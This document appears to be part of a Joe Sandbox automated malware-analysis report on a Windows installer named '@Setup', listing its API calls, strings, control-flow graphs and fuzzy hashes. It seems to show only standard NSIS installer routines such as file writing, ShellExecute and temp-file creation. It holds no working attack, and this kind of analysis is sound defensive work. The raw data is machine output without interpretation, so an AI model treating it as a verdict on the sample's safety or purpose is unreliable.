                                                                                                                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                    • API String ID: 2435955865-3712954417

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    • Graph image not reproduced (legend: Executed, Not Executed); first block 406831-40683c
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                    • API String ID: 3581403547-1792361021

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    • Graph image not reproduced (legend: Executed, Not Executed); first block 406301-406315
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                                    • String ID: jF
                                                                                                                                                    • API String ID: 2295610775-3349280890
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 310444273-0

                                                                                                                                                    Control-flow Graph
                                                                                                                                                    • Graph image not reproduced (legend: Executed, Not Executed); first block 4015a0-4015f4
                                                                                                                                                    APIs
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                    Strings
                                                                                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                                                                                    • Jump: %d, xrefs: 00401602
                                                                                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                    • Call: %d, xrefs: 0040165A
                                                                                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                    • BringToFront, xrefs: 004016BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                    • API String ID: 608394941-2746725676
                                                                                                                                                    • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                    • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                                                                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,RaFill,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,RaFill,RaFill,00000000,00000000,RaFill,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                    • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$RaFill
                                                                                                                                                    • API String ID: 4286501637-178782404
                                                                                                                                                    • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                    • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                                                                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00426976,00403792,00000000), ref: 004034FF
                                                                                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                    • String ID: (]C$... %d%%$pAB$v)B$viB
                                                                                                                                                    • API String ID: 651206458-946357456
                                                                                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                    • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                    Strings
                                                                                                                                                    • Null, xrefs: 004036AA
                                                                                                                                                    • Error launching installer, xrefs: 00403603
                                                                                                                                                    • soft, xrefs: 004036A1
                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                    • Inst, xrefs: 00403698
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 780 404f9e-404fb1 781 404fb7-404fca 780->781 782 40506e-405070 780->782 783 404fd5-404fe1 lstrlenW 781->783 784 404fcc-404fd0 call 406831 781->784 786 404fe3-404ff3 lstrlenW 783->786 787 404ffe-405002 783->787 784->783 788 404ff5-404ff9 lstrcatW 786->788 789 40506c-40506d 786->789 790 405011-405015 787->790 791 405004-40500b SetWindowTextW 787->791 788->787 789->782 792 405017-405059 SendMessageW * 3 790->792 793 40505b-40505d 790->793 791->790 792->793 793->789 794 40505f-405064 793->794 794->789
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                    • lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                    • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                    • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426976,74DF23A0,00000000), ref: 00406902
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                    • String ID:

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 795 402713-40273b call 406035 * 2 800 402746-402749 795->800 801 40273d-402743 call 40145c 795->801 803 402755-402758 800->803 804 40274b-402752 call 40145c 800->804 801->800 807 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 803->807 808 40275a-402761 call 40145c 803->808 804->803 808->807
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                    • String ID: <RM>$RaFill$WriteINIStr: wrote [%s] %s=%s in %s

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 816 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 827 402223-4030f2 call 4062cf 816->827 828 40220d-40221b call 4062cf 816->828 828->827
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    Strings
                                                                                                                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    control_flow_graph 836 405eab-405eb7 837 405eb8-405eec GetTickCount GetTempFileNameW 836->837 838 405efb-405efd 837->838 839 405eee-405ef0 837->839 841 405ef5-405ef8 838->841 839->837 840 405ef2 839->840 840->841
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                    • String ID: nsa
                                                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                                                    • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                    • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                    • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                    • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 842 402175-40218b call 401446 * 2 847 402198-40219d 842->847 848 40218d-402197 call 4062cf 842->848 849 4021aa-4021b0 EnableWindow 847->849 850 40219f-4021a5 ShowWindow 847->850 848->847 852 4030e3-4030f2 849->852 850->852
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                    • String ID: HideWindow
                                                                                                                                                    • API String ID: 1249568736-780306582
                                                                                                                                                    • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                    APIs
                                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                    Memory Dump Source
